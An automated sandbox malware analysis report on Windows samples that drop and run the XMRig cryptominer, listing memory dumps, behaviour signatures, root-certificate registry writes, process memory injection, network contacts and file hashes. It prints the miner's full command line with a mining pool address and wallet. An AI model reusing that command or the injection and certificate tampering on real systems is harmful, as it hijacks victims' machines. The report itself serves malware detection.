memory/4888-17-0x00000158CFC00000-0x00000158CFC20000-memory.dmp
memory/4888-19-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-20-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-21-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-23-0x00000158CFBE0000-0x00000158CFC00000-memory.dmp
memory/4888-22-0x00000158CFC00000-0x00000158CFC20000-memory.dmp
memory/4888-24-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-25-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-26-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-27-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-28-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-29-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-30-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-31-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-32-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-33-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-34-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-35-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-36-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-37-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-38-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-39-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-40-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-41-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-42-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-43-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-44-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-45-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-46-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-47-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-48-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-49-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-50-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-51-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-52-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-53-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-54-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-55-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-56-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-57-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-58-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-59-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-60-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-61-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-62-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-63-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-64-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-65-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-66-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-67-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-68-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-69-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-70-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-71-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-72-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-73-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-74-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-75-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-76-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-77-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-78-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-79-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-80-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-81-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-82-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 740 wrote to memory of 4744 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 740 wrote to memory of 4744 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| BE | 2.17.107.131:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4744-14-0x00000234932D0000-0x00000234932F0000-memory.dmp
memory/4744-15-0x0000023493330000-0x0000023493350000-memory.dmp
memory/4744-16-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-17-0x00000235275C0000-0x00000235275E0000-memory.dmp
memory/4744-18-0x00000235275A0000-0x00000235275C0000-memory.dmp
memory/4744-19-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-20-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-21-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-23-0x00000235275A0000-0x00000235275C0000-memory.dmp
memory/4744-22-0x00000235275C0000-0x00000235275E0000-memory.dmp
memory/4744-24-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-25-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-26-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-27-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-28-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-29-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-30-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-31-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-32-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-33-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-34-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-35-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-36-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-37-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-38-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-39-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-40-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-41-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-42-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-43-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-44-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-45-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-46-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-47-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-48-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-49-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-50-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-51-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-52-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-53-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-54-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-55-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-56-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-57-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-58-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-59-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-60-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-61-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-62-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-63-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-64-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-65-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-66-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-67-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-68-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-69-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-70-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-71-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-72-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-73-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-74-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-75-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-76-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-77-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-78-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-79-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-80-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-81-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-82-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:43
Platform
win10v2004-20240508-en
Max time kernel
1627s
Max time network
1639s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |